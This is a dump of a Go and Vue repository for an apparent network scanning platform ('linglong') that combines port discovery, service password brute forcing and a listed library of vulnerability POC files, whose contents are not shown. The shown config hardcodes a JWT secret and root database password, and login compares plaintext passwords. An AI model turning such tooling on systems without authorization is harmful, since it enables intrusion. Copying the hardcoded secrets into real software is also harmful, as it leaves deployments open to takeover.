├── .gitignore ├── Dockerfile ├── README.md ├── config.yaml ├── configs ├── config.yaml ├── ip.txt ├── pass.txt └── user.txt ├── docker-compose.yml ├── global └── setting.go ├── go.mod ├── go.sum ├── img ├── ChangeLog.md ├── Finger.md ├── addtask.png ├── docker.png ├── docker2.png ├── finger.gif ├── index.gif ├── ip.png ├── login.png ├── setting.gif ├── task-de.png ├── task.gif ├── xray-poc.png └── xray.png ├── linglong ├── main.go ├── middleware └── jwt │ └── jwt.go ├── models ├── Iplist.go ├── auth.go ├── finger.go ├── log.go ├── models.go ├── portbrute.go ├── setting.go ├── task.go ├── tasklog.go ├── webloginlist.go └── xrayres.go ├── mysql ├── Dockerfile ├── init.sql └── my.cnf ├── pkg ├── brute │ └── brute.go ├── common │ ├── common.go │ ├── file.go │ └── var.go ├── e │ ├── code.go │ └── msg.go ├── jobs │ ├── cron.go │ ├── init.go │ └── job.go ├── plugins │ ├── ftp.go │ ├── mongodb.go │ ├── mssql.go │ ├── mysql.go │ ├── plugins.go │ ├── postgres.go │ ├── redis.go │ ├── smb.go │ └── ssh.go ├── pocs │ ├── activemq-cve-2016-3088.yml │ ├── activemq-default-password.yml │ ├── airflow-unauth.yml │ ├── alibaba-nacos-v1-auth-bypass.yml │ ├── apache-flink-upload-rce.yml │ ├── apache-kylin-unauth-cve-2020-13937.yml │ ├── apache-ofbiz-cve-2018-8033-xxe.yml │ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml │ ├── aspcms-backend-leak.yml │ ├── bash-cve-2014-6271.yml │ ├── bt742-pma-unauthorized-access.yml │ ├── cacti-weathermap-file-write.yml │ ├── chinaunicom-modem-default-password.yml │ ├── cisco-cve-2020-3452-readfile.yml │ ├── citrix-cve-2019-19781-path-traversal.yml │ ├── citrix-cve-2020-8191-xss.yml │ ├── citrix-cve-2020-8193-unauthorized.yml │ ├── citrix-xenmobile-cve-2020-8209.yml │ ├── coldfusion-cve-2010-2861-lfi.yml │ ├── confluence-cve-2015-8399.yml │ ├── confluence-cve-2019-3396-lfi.yml │ ├── consul-rexec-rce.yml │ ├── consul-service-rce.yml │ ├── coremail-cnvd-2019-16798.yml │ ├── couchcms-cve-2018-7662.yml │ ├── couchdb-cve-2017-12635.yml │ ├── 
couchdb-unauth.yml │ ├── craftcms-seomatic-cve-2020-9757-rce.yml │ ├── dedecms-carbuyaction-fileinclude.yml │ ├── dedecms-cve-2018-6910.yml │ ├── dedecms-cve-2018-7700-rce.yml │ ├── dedecms-guestbook-sqli.yml │ ├── dedecms-membergroup-sqli.yml │ ├── dedecms-url-redirection.yml │ ├── discuz-ml3x-cnvd-2019-22239.yml │ ├── discuz-v72-sqli.yml │ ├── discuz-wechat-plugins-unauth.yml │ ├── discuz-wooyun-2010-080723.yml │ ├── dlink-850l-info-leak.yml │ ├── dlink-cve-2019-16920-rce.yml │ ├── dlink-cve-2019-17506.yml │ ├── dlink-cve-2020-9376-dump-credentials.yml │ ├── dlink-dsl-2888a-rce.yml │ ├── docker-api-unauthorized-rce.yml │ ├── docker-registry-api-unauth.yml │ ├── dotnetcms-sqli.yml │ ├── draytek-cve-2020-8515.yml │ ├── druid-monitor-unauth.yml │ ├── drupal-cve-2014-3704-sqli.yml │ ├── drupal-cve-2018-7600-rce.yml │ ├── drupal-cve-2019-6340.yml │ ├── duomicms-sqli.yml │ ├── dvr-cve-2018-9995.yml │ ├── ecology-filedownload-directory-traversal.yml │ ├── ecology-javabeanshell-rce.yml │ ├── ecology-springframework-directory-traversal.yml │ ├── ecology-syncuserinfo-sqli.yml │ ├── ecology-validate-sqli.yml │ ├── ecology-workflowcentertreedata-sqli.yml │ ├── ecshop-cnvd-2020-58823-sqli.yml │ ├── ecshop-rce.yml │ ├── elasticsearch-cve-2014-3120.yml │ ├── elasticsearch-cve-2015-1427.yml │ ├── elasticsearch-cve-2015-3337-lfi.yml │ ├── elasticsearch-unauth.yml │ ├── etcd-unauth.yml │ ├── etouch-v2-sqli.yml │ ├── f5-tmui-cve-2020-5902-rce.yml │ ├── fangweicms-sqli.yml │ ├── feifeicms-lfr.yml │ ├── finecms-sqli.yml │ ├── finereport-directory-traversal.yml │ ├── flexpaper-cve-2018-11686.yml │ ├── flink-jobmanager-cve-2020-17519-lfi.yml │ ├── fortigate-cve-2018-13379-readfile.yml │ ├── frp-dashboard-unauth.yml │ ├── gilacms-cve-2020-5515.yml │ ├── glassfish-cve-2017-1000028-lfi.yml │ ├── go-pprof-leak.yml │ ├── h2-database-web-console-unauthorized-access.yml │ ├── hadoop-yarn-unauth.yml │ ├── harbor-cve-2019-16097.yml │ ├── hikvision-cve-2017-7921.yml │ ├── 
ifw8-router-cve-2019-16313.yml │ ├── influxdb-unauth.yml │ ├── jboss-cve-2010-1871.yml │ ├── jboss-unauth.yml │ ├── jenkins-cve-2018-1000600.yml │ ├── jenkins-cve-2018-1000861-rce.yml │ ├── jenkins-unauthorized-access.yml │ ├── jira-cve-2019-11581.yml │ ├── jira-cve-2019-8442.yml │ ├── jira-cve-2019-8449.yml │ ├── jira-cve-2020-14179.yml │ ├── jira-cve-2020-14181.yml │ ├── jira-ssrf-cve-2019-8451.yml │ ├── joomla-cnvd-2019-34135-rce.yml │ ├── joomla-component-vreview-sql.yml │ ├── joomla-cve-2015-7297-sqli.yml │ ├── joomla-cve-2017-8917-sqli.yml │ ├── joomla-cve-2018-7314-sql.yml │ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml │ ├── jumpserver-unauth-rce.yml │ ├── jupyter-notebook-unauthorized-access.yml │ ├── kafka-manager-unauth.yml │ ├── kibana-cve-2018-17246.yml │ ├── kibana-unauth.yml │ ├── kong-cve-2020-11710-unauth.yml │ ├── lanproxy-cve-2021-3019-lfi.yml │ ├── laravel-debug-info-leak.yml │ ├── laravel-improper-webdir.yml │ ├── maccms-rce.yml │ ├── maccmsv10-backdoor.yml │ ├── metinfo-cve-2019-16996-sqli.yml │ ├── metinfo-cve-2019-16997-sqli.yml │ ├── metinfo-cve-2019-17418-sqli.yml │ ├── metinfo-lfi-cnvd-2018-13393.yml │ ├── minio-default-password.yml │ ├── mongo-express-cve-2019-10758.yml │ ├── msvod-sqli.yml │ ├── myucms-lfr.yml │ ├── nagio-cve-2018-10735.yml │ ├── nagio-cve-2018-10736.yml │ ├── nagio-cve-2018-10737.yml │ ├── nagio-cve-2018-10738.yml │ ├── netgear-cve-2017-5521.yml │ ├── nextjs-cve-2017-16877.yml │ ├── nexus-cve-2019-7238.yml │ ├── nexus-cve-2020-10199.yml │ ├── nexus-cve-2020-10204.yml │ ├── nexus-default-password.yml │ ├── nexusdb-cve-2020-24571-path-traversal.yml │ ├── nhttpd-cve-2019-16278.yml │ ├── nps-default-password.yml │ ├── nsfocus-uts-password-leak.yml │ ├── nuuo-file-inclusion.yml │ ├── openfire-cve-2019-18394-ssrf.yml │ ├── opentsdb-cve-2020-35476-rce.yml │ ├── pandorafms-cve-2019-20224-rce.yml │ ├── php-cgi-cve-2012-1823.yml │ ├── phpcms-cve-2018-19127.yml │ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml │ ├── 
phpmyadmin-setup-deserialization.yml │ ├── phpok-sqli.yml │ ├── phpshe-sqli.yml │ ├── phpstudy-backdoor-rce.yml │ ├── phpstudy-nginx-wrong-resolve.yml │ ├── phpunit-cve-2017-9841-rce.yml │ ├── powercreator-arbitrary-file-upload.yml │ ├── pulse-cve-2019-11510.yml │ ├── pyspider-unauthorized-access.yml │ ├── qibocms-sqli.yml │ ├── qnap-cve-2019-7192.yml │ ├── rails-cve-2018-3760-rce.yml │ ├── razor-cve-2018-8770.yml │ ├── rconfig-cve-2019-16663.yml │ ├── resin-cnnvd-200705-315.yml │ ├── resin-inputfile-fileread-or-ssrf.yml │ ├── resin-viewfile-fileread.yml │ ├── ruijie-eg-rce.yml │ ├── saltstack-cve-2020-16846.yml │ ├── samsung-wea453e-default-pwd.yml │ ├── samsung-wea453e-rce.yml │ ├── sangfor-edr-arbitrary-admin-login.yml │ ├── sangfor-edr-cssp-rce.yml │ ├── sangfor-edr-tool-rce.yml │ ├── satellian-cve-2020-7980-rce.yml │ ├── seacms-before-v992-rce.yml │ ├── seacms-rce.yml │ ├── seacms-sqli.yml │ ├── seacms-v654-rce.yml │ ├── seacmsv645-command-exec.yml │ ├── seeyon-ajax-unauthorized-access.yml │ ├── seeyon-cnvd-2020-62422-readfile.yml │ ├── seeyon-wooyun-2015-0108235-sqli.yml │ ├── seeyon-wooyun-2015-148227.yml │ ├── solarwinds-cve-2020-10148.yml │ ├── solr-cve-2017-12629-xxe.yml │ ├── solr-cve-2019-0193.yml │ ├── solr-velocity-template-rce.yml │ ├── sonarqube-cve-2020-27986-unauth.yml │ ├── sonicwall-ssl-vpn-rce.yml │ ├── spark-api-unauth.yml │ ├── spark-webui-unauth.yml │ ├── spring-cloud-cve-2020-5405.yml │ ├── spring-cloud-cve-2020-5410.yml │ ├── spring-cve-2016-4977.yml │ ├── springboot-env-unauth.yml │ ├── springcloud-cve-2019-3799.yml │ ├── supervisord-cve-2017-11610.yml │ ├── tensorboard-unauth.yml │ ├── terramaster-cve-2020-15568.yml │ ├── terramaster-cve-2020-28188-rce.yml │ ├── thinkadmin-v6-readfile.yml │ ├── thinkcmf-lfi.yml │ ├── thinkcmf-write-shell.yml │ ├── thinkphp-v6-file-write.yml │ ├── thinkphp5-controller-rce.yml │ ├── thinkphp5023-method-rce.yml │ ├── tomcat-cve-2017-12615-rce.yml │ ├── tomcat-cve-2018-11759.yml │ ├── 
tongda-meeting-unauthorized-access.yml │ ├── tpshop-sqli.yml │ ├── typecho-rce.yml │ ├── ueditor-cnvd-2017-20077-file-upload.yml │ ├── uwsgi-cve-2018-7490.yml │ ├── vbulletin-cve-2019-16759-bypass.yml │ ├── vbulletin-cve-2019-16759.yml │ ├── vmware-vcenter-arbitrary-file-read.yml │ ├── weaver-ebridge-file-read.yml │ ├── weblogic-cve-2017-10271.yml │ ├── weblogic-cve-2019-2725.yml │ ├── weblogic-cve-2019-2729-1.yml │ ├── weblogic-cve-2019-2729-2.yml │ ├── weblogic-cve-2020-14750.yml │ ├── weblogic-ssrf.yml │ ├── webmin-cve-2019-15107-rce.yml │ ├── wordpress-cve-2019-19985-infoleak.yml │ ├── wordpress-ext-adaptive-images-lfi.yml │ ├── wordpress-ext-mailpress-rce.yml │ ├── wuzhicms-v410-sqli.yml │ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml │ ├── xunchi-cnvd-2020-23735-file-read.yml │ ├── yccms-rce.yml │ ├── yonyou-grp-u8-sqli-to-rce.yml │ ├── yonyou-grp-u8-sqli.yml │ ├── yonyou-nc-arbitrary-file-upload.yml │ ├── youphptube-encoder-cve-2019-5127.yml │ ├── youphptube-encoder-cve-2019-5128.yml │ ├── youphptube-encoder-cve-2019-5129.yml │ ├── yungoucms-sqli.yml │ ├── zabbix-authentication-bypass.yml │ ├── zabbix-cve-2016-10134-sqli.yml │ ├── zcms-v3-sqli.yml │ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml │ ├── zeroshell-cve-2019-12725-rce.yml │ ├── zimbra-cve-2019-9670-xxe.yml │ └── zzcms-zsmanage-sqli.yml ├── setting │ ├── section.go │ └── setting.go ├── third │ └── xray_linux_amd64 ├── utils.go └── utils │ ├── jwt.go │ └── pagination.go ├── routers ├── api │ ├── auth.go │ └── v1 │ │ ├── Iplist.go │ │ ├── alyaze │ │ ├── jobdesc.go │ │ ├── wappalyze.go │ │ └── webanalyze.go │ │ ├── finger.go │ │ ├── log.go │ │ ├── portbrute.go │ │ ├── setting.go │ │ ├── task.go │ │ ├── tasklog.go │ │ ├── webloginlist.go │ │ └── xrayres.go ├── router.go └── tools │ ├── masscan │ └── masscan.go │ └── nmap │ └── nmap.go ├── web ├── .env ├── Dockerfile ├── babel.config.js ├── dist │ ├── 12.png │ ├── css │ │ ├── app.3d466215.css │ │ └── chunk-vendors.2ac5db4b.css │ ├── 
favicon.ico │ ├── fonts │ │ ├── element-icons.535877f5.woff │ │ └── element-icons.732389de.ttf │ ├── img │ │ ├── all.ba8c4734.png │ │ ├── bg.8e171a3c.png │ │ ├── iconfont.82d03b7e.svg │ │ ├── ipall.777d2626.png │ │ └── logo.46db48c9.png │ ├── index.html │ └── js │ │ ├── app.4dccb236.js │ │ ├── app.4dccb236.js.map │ │ ├── chunk-vendors.cc02a279.js │ │ └── chunk-vendors.cc02a279.js.map ├── nginx.conf ├── package-lock.json ├── package.json ├── public │ ├── 12.png │ ├── favicon.ico │ └── index.html ├── server-config.js ├── src │ ├── App.vue │ ├── assets │ │ ├── all.png │ │ ├── css │ │ │ └── global.css │ │ ├── fonts │ │ │ ├── demo.css │ │ │ ├── demo_fontclass.html │ │ │ ├── demo_symbol.html │ │ │ ├── demo_unicode.html │ │ │ ├── iconfont.css │ │ │ ├── iconfont.eot │ │ │ ├── iconfont.js │ │ │ ├── iconfont.svg │ │ │ ├── iconfont.ttf │ │ │ └── iconfont.woff │ │ ├── img │ │ │ ├── bg.png │ │ │ └── btn.png │ │ ├── ipall.png │ │ ├── login.png │ │ ├── logo.png │ │ └── vuln.png │ ├── components │ │ ├── HelloWorld.vue │ │ ├── Home.vue │ │ ├── Login.vue │ │ ├── Welcome.vue │ │ ├── finger │ │ │ └── finger.vue │ │ ├── jobips │ │ │ └── Jobips.vue │ │ ├── log │ │ │ └── Log.vue │ │ ├── modpass │ │ │ └── Modpass.vue │ │ ├── setting │ │ │ └── Setting.vue │ │ ├── task │ │ │ ├── Task.vue │ │ │ └── Tasklog.vue │ │ ├── webloginlist │ │ │ └── Webloginlist.vue │ │ └── xrayres │ │ │ └── Xrayres.vue │ ├── main.js │ ├── plugins │ │ └── element.js │ ├── router │ │ └── index.js │ └── views │ │ ├── About.vue │ │ └── Home.vue └── vue.config.js └── 漏洞报告.xlsx /.gitignore: -------------------------------------------------------------------------------- 1 | # local env files 2 | .env.local 3 | .env.*.local 4 | 5 | .codelog 6 | /web/node_modules/ 7 | /pkg/third/xray_darwin_amd64 8 | /img/linglong-21-02-22(compose版).zip 9 | 10 | # Editor directories and files 11 | .idea 12 | .vscode 13 | *.suo 14 | *.ntvs* 15 | *.njsproj 16 | *.sln 17 | *.sw 18 | 19 | i# General 20 | .DS_Store 21 | .AppleDouble 22 | 
.LSOverride 23 | 24 | # Icon must end with two \r 25 | Icon 26 | 27 | # Thumbnails 28 | ._* 29 | 30 | # Files that might appear in the root of a volume 31 | .DocumentRevisions-V100 32 | .fseventsd 33 | .Spotlight-V100 34 | .TemporaryItems 35 | .Trashes 36 | .VolumeIcon.icns 37 | .com.apple.timemachine.donotpresent 38 | 39 | # Directories potentially created on remote AFP share 40 | .AppleDB 41 | .AppleDesktop 42 | Network Trash Folder 43 | Temporary Items 44 | .apdisk 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | 3 | MAINTAINER drunk_kk 4 | 5 | ENV LC_ALL C.UTF-8 6 | ENV TZ=Asia/Shanghai 7 | RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone 8 | 9 | RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list 10 | 11 | RUN set -x \ 12 | && apt-get clean \ 13 | && apt-get update -y \ 14 | && apt-get install -y nmap masscan 15 | 16 | WORKDIR /build 17 | 18 | ENV GO111MODULE=on \ 19 | CGO_ENABLED=0 \ 20 | GOOS=linux \ 21 | GOARCH=amd64 22 | 23 | COPY . . 
24 | 25 | EXPOSE 18000 26 | 27 | CMD ["./linglong"] 28 | 29 | -------------------------------------------------------------------------------- /configs/config.yaml: -------------------------------------------------------------------------------- 1 | Server: 2 | RunMode: debug 3 | HttpPort: 18000 4 | ReadTimeout: 60 5 | WriteTimeout: 60 6 | App: 7 | DefaultPageSize: 10 8 | MaxPageSize: 100 9 | DefaultContextTimeout: 60 10 | JwtSecret: fas65fd4541e352231a#D12 11 | PortUserDict: ./configs/user.txt 12 | PortPassDict: ./configs/pass.txt 13 | Database: 14 | DBType: mysql 15 | UserName: root 16 | Password: linglong8s 17 | Host: mysql 18 | # Host: 127.0.0.1:3306 19 | DBName: linglong 20 | TablePrefix: 21 | Charset: utf8 22 | ParseTime: True 23 | MaxIdleConns: 10 24 | MaxOpenConns: 30 25 | -------------------------------------------------------------------------------- /configs/ip.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/configs/ip.txt -------------------------------------------------------------------------------- /configs/user.txt: -------------------------------------------------------------------------------- 1 | root 2 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | mysql: 4 | build: ./mysql 5 | environment: 6 | - TZ=Asia/Shanghai 7 | - MYSQL_DATABASE=linglong 8 | - MYSQL_ROOT_PASSWORD=linglong8s 9 | ports: 10 | - "3305:3306" 11 | restart: always 12 | command: [ 13 | '--character-set-server=utf8mb4', 14 | '--collation-server=utf8mb4_unicode_ci', 15 | ] 16 | server: 17 | container_name: 'linglong-server' 18 | build: . 
19 | ports: 20 | - "18000:18000" 21 | links: 22 | - mysql:mysql 23 | depends_on: 24 | - mysql 25 | restart: always 26 | environment: 27 | - TZ=Asia/Shanghai 28 | web: 29 | container_name: 'linglong-web' 30 | restart: always 31 | build: ./web 32 | ports: 33 | - 8001:8001 34 | # volumes: 35 | # - ./nginx.conf:/etc/nginx/nginx.conf 36 | depends_on: 37 | - server 38 | -------------------------------------------------------------------------------- /global/setting.go: -------------------------------------------------------------------------------- 1 | package global 2 | 3 | import "linglong/pkg/setting" 4 | 5 | var ( 6 | ServerSetting *setting.ServerSettingS 7 | AppSetting *setting.AppSettingS 8 | DatabaseSetting *setting.DatabaseSettingS 9 | MasscanSetting *setting.MasscanSettingS 10 | ) 11 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module linglong 2 | 3 | go 1.14 4 | 5 | require ( 6 | github.com/360EntSecGroup-Skylar/excelize v1.4.1 7 | github.com/PuerkitoBio/goquery v1.5.1 8 | github.com/Ullaakut/nmap v2.0.0+incompatible 9 | github.com/astaxie/beego v1.12.2 10 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 11 | github.com/bobesa/go-domain-util v0.0.0-20190911083921-4033b5f7dd89 12 | github.com/denisenkom/go-mssqldb v0.0.0-20191124224453-732737034ffd 13 | github.com/dgrijalva/jwt-go v3.2.0+incompatible 14 | github.com/fatih/color v1.7.0 15 | github.com/fvbock/endless v0.0.0-20170109170031-447134032cb6 16 | github.com/gin-gonic/gin v1.6.3 17 | github.com/go-redis/redis v6.14.2+incompatible 18 | github.com/gogf/gf v1.13.3 19 | github.com/jinzhu/gorm v1.9.16 20 | github.com/jlaffaye/ftp v0.0.0-20200812143550-39e3779af0db 21 | github.com/jteeuwen/go-bindata v3.0.7+incompatible // indirect 22 | github.com/lib/pq v1.1.1 23 | github.com/lisijie/cron v0.0.0-20151225081149-1c5ac61b9f22 24 | github.com/malfunkt/iprange v0.9.0 25 | 
github.com/mattn/go-colorable v0.1.7 // indirect 26 | github.com/netxfly/mysql v1.0.3 27 | github.com/robfig/cron/v3 v3.0.0 28 | github.com/spf13/viper v1.7.1 29 | github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 30 | github.com/unknwon/com v1.0.1 31 | golang.org/x/crypto v0.0.0-20191205180655-e7c4368fe9dd 32 | gopkg.in/mgo.v2 v2.0.0-20190816093944-a6b53ec6cb22 33 | ) 34 | -------------------------------------------------------------------------------- /img/ChangeLog.md: -------------------------------------------------------------------------------- 1 | 2 | > 记录一些更新日志 3 | 4 | - [x] [2021-0210] 指纹资产管理、增删改查 5 | - [x] [2021-0210] 优化资产的查询方式 6 | - [x] [2021-0213] 发现资产POC自动扫描、扫描结果界面查看、删除 7 | - [x] [2021-0214] 密码修改功能,关闭Xray-server-error 8 | - [x] [2021-0215] Docker折腾了好久 9 | - [x] [2021-0225] 更新docker-compose的部署方式 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /img/Finger.md: -------------------------------------------------------------------------------- 1 | 2 | > 指纹是Json格式,如下指纹案例 3 | 4 | ```json 5 | "Shiro": { 6 | "cookies": { 7 | "rememberMe": "" 8 | } 9 | } 10 | ``` 11 | 12 | ```json 13 | "PHPMyAdmin": { 14 | "html": "phpMyAdmin ", 15 | "html": "/themes/pmahomme/img/logo_right.png" 16 | } 17 | ``` 18 | 19 | ```json 20 | "Kibana": { 21 | "headers": { 22 | "kbn-name": "kibana", 23 | "kbn-version": "^([\\d.]+)$\\;version:\\1" 24 | }, 25 | "html": "Kibana" 26 | } 27 | ``` 28 | 29 | 30 | | 参数 | 说明 | 31 | | :-------------------- | :----------------------------------------------------------- | 32 | | html | 正则匹配网页的html | 33 | | headers | 正则匹配网页的headers | 34 | | cookies | 正则匹配网页的cookies | 35 | -------------------------------------------------------------------------------- /img/addtask.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/addtask.png 
-------------------------------------------------------------------------------- /img/docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/docker.png -------------------------------------------------------------------------------- /img/docker2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/docker2.png -------------------------------------------------------------------------------- /img/finger.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/finger.gif -------------------------------------------------------------------------------- /img/index.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/index.gif -------------------------------------------------------------------------------- /img/ip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/ip.png -------------------------------------------------------------------------------- /img/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/login.png -------------------------------------------------------------------------------- /img/setting.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/setting.gif 
-------------------------------------------------------------------------------- /img/task-de.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/task-de.png -------------------------------------------------------------------------------- /img/task.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/task.gif -------------------------------------------------------------------------------- /img/xray-poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/xray-poc.png -------------------------------------------------------------------------------- /img/xray.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/xray.png -------------------------------------------------------------------------------- /linglong: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/linglong -------------------------------------------------------------------------------- /middleware/jwt/jwt.go: -------------------------------------------------------------------------------- 1 | package jwt 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "linglong/pkg/e" 6 | "linglong/pkg/utils" 7 | "net/http" 8 | "time" 9 | ) 10 | 11 | func JWT() gin.HandlerFunc { 12 | return func(c *gin.Context) { 13 | var code int 14 | var data interface{} 15 | 16 | code = e.SUCCESS 17 | token := c.GetHeader("Authorization") 18 | 19 | if token == "" { 20 | code = e.INVALID_PARAMS 21 | } else 
{ 22 | claims, err := utils.ParseToken(token) 23 | if claims == nil{ 24 | c.JSON(http.StatusUnauthorized, gin.H{ 25 | "code" : 401, 26 | "msg" : "cookie失效,请点击右上角退出重新登陆", 27 | "data" : data, 28 | }) 29 | c.Abort() 30 | return 31 | } 32 | if err != nil { 33 | code = e.ERROR 34 | } else if time.Now().Unix() > claims.ExpiresAt { 35 | code =e.ERROR 36 | } 37 | } 38 | 39 | if code != e.SUCCESS { 40 | c.JSON(http.StatusUnauthorized, gin.H{ 41 | "code" : code, 42 | "msg" : e.GetMsg(code), 43 | "data" : data, 44 | }) 45 | 46 | c.Abort() 47 | return 48 | } 49 | 50 | c.Next() 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /models/auth.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | type Auth struct { 4 | ID int `gorm:"primary_key" json:"id"` 5 | Username string `json:"username"` 6 | Password string `json:"password"` 7 | } 8 | 9 | func CheckAuth(username, password string) bool { 10 | var auth Auth 11 | db.Select("id").Where(Auth{Username: username, Password: password}).First(&auth) 12 | if auth.ID > 0 { 13 | return true 14 | } 15 | 16 | return false 17 | } 18 | 19 | func EditAuth(name string,data interface{}) bool { 20 | db.Model(&Auth{}).Where("username = ? 
",name).Updates(data) 21 | return true 22 | } 23 | -------------------------------------------------------------------------------- /models/models.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | import ( 4 | "fmt" 5 | "linglong/global" 6 | "log" 7 | "github.com/jinzhu/gorm" 8 | _ "github.com/jinzhu/gorm/dialects/mysql" 9 | ) 10 | 11 | var db *gorm.DB 12 | 13 | type Model struct { 14 | ID int `gorm:"primary_key" json:"id"` 15 | } 16 | 17 | 18 | func Setup() { 19 | var err error 20 | db, err = gorm.Open(global.DatabaseSetting.DBType, fmt.Sprintf("%s:%s@tcp(%s)/%s?charset=utf8&parseTime=True&loc=Local", 21 | global.DatabaseSetting.UserName, 22 | global.DatabaseSetting.Password, 23 | global.DatabaseSetting.Host, 24 | global.DatabaseSetting.DBName)) 25 | 26 | if err != nil { 27 | log.Fatalf("models.Setup err: %v", err) 28 | } 29 | 30 | gorm.DefaultTableNameHandler = func(db *gorm.DB, defaultTableName string) string { 31 | return global.DatabaseSetting.TablePrefix + defaultTableName 32 | } 33 | 34 | db.SingularTable(true) 35 | db.LogMode(true) 36 | } 37 | -------------------------------------------------------------------------------- /models/setting.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | type Setting struct { 4 | *Model 5 | Ip string `json:"ip"` 6 | LoginWord string `json:"login_word"` 7 | LoginUrl string `json:"login_url"` 8 | MasscanThred int `json:"masscan_thred"` 9 | MasscanDeltime int `json:"masscan_deltime"` 10 | MasscanIp string `json:"masscan_ip"` 11 | MasscanPort string `json:"masscan_port"` 12 | MasscanWhite string `json:"masscan_white"` 13 | CreatedTime string `json:"created_time"` 14 | UpdatedTime string `json:"updated_time"` 15 | } 16 | 17 | func GetSetting(pageNum int, pageSize int, maps interface{}) (setting []Setting) { 18 | db.Where(maps).First(&setting) 19 | return 20 | } 21 | 22 | func GetSettingTotal(maps 
interface{}) (count int) { 23 | db.Model(&Setting{}).Where(maps).Count(&count) 24 | return 25 | } 26 | 27 | func EditSetting(data interface{}) bool { 28 | db.Model(&Setting{}).Updates(data) 29 | return true 30 | } 31 | 32 | //根据条件获取全部资产爆破 33 | func GetSettingTitle() (setting []Setting) { 34 | db.First(&setting) 35 | return 36 | } 37 | -------------------------------------------------------------------------------- /mysql/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mysql:5.7 2 | COPY ./init.sql /docker-entrypoint-initdb.d -------------------------------------------------------------------------------- /mysql/my.cnf: -------------------------------------------------------------------------------- 1 | [mysqld] 2 | user=mysql 3 | default-storage-engine=INNODB 4 | character-set-server=utf8 5 | [client] 6 | default-character-set=utf8 7 | [mysql] 8 | default-character-set=utf8 9 | -------------------------------------------------------------------------------- /pkg/common/var.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "linglong/models" 5 | "strings" 6 | "sync" 7 | ) 8 | 9 | var ( 10 | Mutex sync.Mutex 11 | 12 | PortNames = map[int]string{ 13 | 21: "FTP", 14 | 22: "SSH", 15 | 161: "SNMP", 16 | 445: "SMB", 17 | 1433: "MSSQL", 18 | 3306: "MYSQL", 19 | 5432: "POSTGRESQL", 20 | 6379: "REDIS", 21 | 9200: "ELASTICSEARCH", 22 | 27017: "MONGODB", 23 | } 24 | 25 | SupportProtocols map[string]bool 26 | 27 | BruteResult map[string]models.Service 28 | ) 29 | 30 | func init() { 31 | 32 | BruteResult = make(map[string]models.Service) 33 | 34 | SupportProtocols = make(map[string]bool) 35 | for _, proto := range PortNames { 36 | SupportProtocols[strings.ToUpper(proto)] = true 37 | } 38 | 39 | } 40 | -------------------------------------------------------------------------------- /pkg/e/code.go: 
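--------------------------------------------------------------------------------
package e

// Response codes returned to API clients (looked up through GetMsg in msg.go).
// The first group reuses HTTP status numbers for familiarity, but they are
// application codes, not the transport status: 402/403/405 are used for
// password and fingerprint validation errors, not for their HTTP meanings.
// Values are part of the client contract and must not be renumbered.
const (
	SUCCESS        = 200
	ERROR          = 500
	INVALID_PARAMS = 400
	INVALID_PASS   = 402 // old password does not match
	INVALID_FINGER = 405 // fingerprint has a trailing comma

	INVALID_DIFFPASS = 403 // the two new passwords differ

	ERROR_CRON_SPEC = 10001 // crontab expression could not be parsed
)
--------------------------------------------------------------------------------
/pkg/e/msg.go:
--------------------------------------------------------------------------------
package e

// MsgFlags maps a response code to its user-facing message.
// The messages are runtime strings shown to API clients (kept in Chinese,
// as shipped); only the comments here are documentation.
var MsgFlags = map[int]string{
	SUCCESS:          "请求成功",           // request succeeded
	ERROR:            "请求失败",           // request failed
	INVALID_PARAMS:   "请求参数错误",       // invalid request parameters
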